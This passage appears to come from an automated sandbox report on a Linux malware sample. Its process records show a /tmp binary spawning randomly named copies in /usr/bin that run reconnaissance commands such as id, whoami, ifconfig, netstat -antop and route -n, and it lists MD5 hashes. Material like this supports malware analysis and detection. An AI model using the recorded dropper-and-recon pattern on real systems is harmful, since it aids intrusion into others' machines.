MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: zetazkptwu PID: 10199, Parent PID: 10198

General

Start time:	09:49:22
Start date:	27/07/2022
Path:	/usr/bin/zetazkptwu
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	293bbabe5dde95c14afaf88a1fbbcb66

Chronological Activities

Analysis Process: dkuidbsedp PID: 10208, Parent PID: 9446

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10209, Parent PID: 10208

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10209, Parent PID: 10208

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	/usr/bin/jvzzirmjsa su 9446
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10210, Parent PID: 10209

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: dkuidbsedp PID: 10219, Parent PID: 9446

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10220, Parent PID: 10219

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10220, Parent PID: 10219

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	/usr/bin/jvzzirmjsa bash 9446
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10221, Parent PID: 10220

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: dkuidbsedp PID: 10230, Parent PID: 9446

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10231, Parent PID: 10230

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10231, Parent PID: 10230

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	/usr/bin/jvzzirmjsa "cat resolv.conf" 9446
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10232, Parent PID: 10231

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: dkuidbsedp PID: 10241, Parent PID: 9446

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10242, Parent PID: 10241

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10242, Parent PID: 10241

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	/usr/bin/jvzzirmjsa "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10243, Parent PID: 10242

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: dkuidbsedp PID: 10252, Parent PID: 9446

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10253, Parent PID: 10252

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10253, Parent PID: 10252

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	/usr/bin/jvzzirmjsa "echo \"find\"" 9446
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: jvzzirmjsa PID: 10254, Parent PID: 10253

General

Start time:	09:49:27
Start date:	27/07/2022
Path:	/usr/bin/jvzzirmjsa
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	0ba3c89d8717188f9c145cab884813ba

Chronological Activities

Analysis Process: dkuidbsedp PID: 10263, Parent PID: 9446

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10264, Parent PID: 10263

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: gkckltchoc PID: 10264, Parent PID: 10263

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	/usr/bin/gkckltchoc pwd 9446
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: gkckltchoc PID: 10265, Parent PID: 10264

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: dkuidbsedp PID: 10274, Parent PID: 9446

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10275, Parent PID: 10274

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: gkckltchoc PID: 10275, Parent PID: 10274

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	/usr/bin/gkckltchoc id 9446
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: gkckltchoc PID: 10276, Parent PID: 10275

General

Start time:	09:49:32
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: dkuidbsedp PID: 10285, Parent PID: 9446

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10286, Parent PID: 10285

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: gkckltchoc PID: 10286, Parent PID: 10285

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	/usr/bin/gkckltchoc "ls -la" 9446
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: gkckltchoc PID: 10287, Parent PID: 10286

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: dkuidbsedp PID: 10296, Parent PID: 9446

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10297, Parent PID: 10296

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: gkckltchoc PID: 10297, Parent PID: 10296

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	/usr/bin/gkckltchoc ifconfig 9446
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: gkckltchoc PID: 10299, Parent PID: 10297

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: dkuidbsedp PID: 10307, Parent PID: 9446

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10308, Parent PID: 10307

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: gkckltchoc PID: 10308, Parent PID: 10307

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	/usr/bin/gkckltchoc "netstat -an" 9446
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: gkckltchoc PID: 10309, Parent PID: 10308

General

Start time:	09:49:33
Start date:	27/07/2022
Path:	/usr/bin/gkckltchoc
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	ff61e50427f02a493dd897777ec8a42f

Chronological Activities

Analysis Process: dkuidbsedp PID: 10318, Parent PID: 9446

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10319, Parent PID: 10318

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: rlxosagpct PID: 10319, Parent PID: 10318

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	/usr/bin/rlxosagpct ifconfig 9446
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: rlxosagpct PID: 10320, Parent PID: 10319

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: dkuidbsedp PID: 10329, Parent PID: 9446

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10330, Parent PID: 10329

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: rlxosagpct PID: 10330, Parent PID: 10329

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	/usr/bin/rlxosagpct pwd 9446
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: rlxosagpct PID: 10331, Parent PID: 10330

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: dkuidbsedp PID: 10340, Parent PID: 9446

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10341, Parent PID: 10340

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: rlxosagpct PID: 10341, Parent PID: 10340

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	/usr/bin/rlxosagpct id 9446
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: rlxosagpct PID: 10342, Parent PID: 10341

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: dkuidbsedp PID: 10351, Parent PID: 9446

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10352, Parent PID: 10351

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: rlxosagpct PID: 10352, Parent PID: 10351

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	/usr/bin/rlxosagpct pwd 9446
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: rlxosagpct PID: 10353, Parent PID: 10352

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: dkuidbsedp PID: 10362, Parent PID: 9446

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10363, Parent PID: 10362

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: rlxosagpct PID: 10363, Parent PID: 10362

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	/usr/bin/rlxosagpct whoami 9446
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: rlxosagpct PID: 10364, Parent PID: 10363

General

Start time:	09:49:38
Start date:	27/07/2022
Path:	/usr/bin/rlxosagpct
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	b51f6012587970272ce94c23f6c52f3a

Chronological Activities

Analysis Process: dkuidbsedp PID: 10373, Parent PID: 9446

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10374, Parent PID: 10373

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: pnljtnsppb PID: 10374, Parent PID: 10373

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	/usr/bin/pnljtnsppb "netstat -antop" 9446
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: pnljtnsppb PID: 10375, Parent PID: 10374

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: dkuidbsedp PID: 10384, Parent PID: 9446

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10385, Parent PID: 10384

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: pnljtnsppb PID: 10385, Parent PID: 10384

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	/usr/bin/pnljtnsppb who 9446
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: pnljtnsppb PID: 10386, Parent PID: 10385

General

Start time:	09:49:43
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: dkuidbsedp PID: 10395, Parent PID: 9446

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10396, Parent PID: 10395

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: pnljtnsppb PID: 10396, Parent PID: 10395

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	/usr/bin/pnljtnsppb "ifconfig eth0" 9446
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: pnljtnsppb PID: 10397, Parent PID: 10396

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: dkuidbsedp PID: 10406, Parent PID: 9446

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10407, Parent PID: 10406

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: pnljtnsppb PID: 10407, Parent PID: 10406

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	/usr/bin/pnljtnsppb "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: pnljtnsppb PID: 10408, Parent PID: 10407

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: dkuidbsedp PID: 10417, Parent PID: 9446

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10418, Parent PID: 10417

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: pnljtnsppb PID: 10418, Parent PID: 10417

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	/usr/bin/pnljtnsppb "netstat -antop" 9446
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: pnljtnsppb PID: 10419, Parent PID: 10418

General

Start time:	09:49:44
Start date:	27/07/2022
Path:	/usr/bin/pnljtnsppb
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	40692a3a476d75da8623f32327526dd6

Chronological Activities

Analysis Process: dkuidbsedp PID: 10428, Parent PID: 9446

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10429, Parent PID: 10428

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lhyaaotaph PID: 10429, Parent PID: 10428

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	/usr/bin/lhyaaotaph "route -n" 9446
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: lhyaaotaph PID: 10430, Parent PID: 10429

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: dkuidbsedp PID: 10439, Parent PID: 9446

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10440, Parent PID: 10439

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lhyaaotaph PID: 10440, Parent PID: 10439

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	/usr/bin/lhyaaotaph id 9446
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: lhyaaotaph PID: 10441, Parent PID: 10440

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: dkuidbsedp PID: 10450, Parent PID: 9446

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10451, Parent PID: 10450

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lhyaaotaph PID: 10451, Parent PID: 10450

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	/usr/bin/lhyaaotaph whoami 9446
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: lhyaaotaph PID: 10452, Parent PID: 10451

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: dkuidbsedp PID: 10459, Parent PID: 9446

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10461, Parent PID: 10459

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lhyaaotaph PID: 10461, Parent PID: 3310

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	/usr/bin/lhyaaotaph ifconfig 9446
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: lhyaaotaph PID: 10463, Parent PID: 10461

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: dkuidbsedp PID: 10462, Parent PID: 9446

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10464, Parent PID: 10462

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: lhyaaotaph PID: 10464, Parent PID: 10462

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	/usr/bin/lhyaaotaph "grep \"A\"" 9446
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: lhyaaotaph PID: 10466, Parent PID: 10464

General

Start time:	09:49:49
Start date:	27/07/2022
Path:	/usr/bin/lhyaaotaph
Arguments:	n/a
File size:	625889 bytes
MD5 hash:	8b0c232594f545d682d180475cf5aa04

Chronological Activities

Analysis Process: dkuidbsedp PID: 10483, Parent PID: 9446

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10484, Parent PID: 10483

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: otigswehlv PID: 10484, Parent PID: 3310

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	/usr/bin/otigswehlv "sleep 1" 9446
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: otigswehlv PID: 10488, Parent PID: 10484

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: dkuidbsedp PID: 10485, Parent PID: 9446

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: dkuidbsedp PID: 10486, Parent PID: 10485

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/tmp/dkuidbsedp
Arguments:	n/a
File size:	625878 bytes
MD5 hash:	37542894283b8851469753de69c0bcdc

Chronological Activities

Analysis Process: otigswehlv PID: 10486, Parent PID: 3310

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	/usr/bin/otigswehlv "route -n" 9446
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: otigswehlv PID: 10500, Parent PID: 10486

General

Start time:	09:49:54
Start date:	27/07/2022
Path:	/usr/bin/otigswehlv
Arguments:	n/a
File size:	625900 bytes
MD5 hash:	2228daad34272962a9c0b67789ea5e77

Chronological Activities

Analysis Process: dkuidbsedp PID: 10487, Parent PID: 9446

General

Start time:	09:49:54
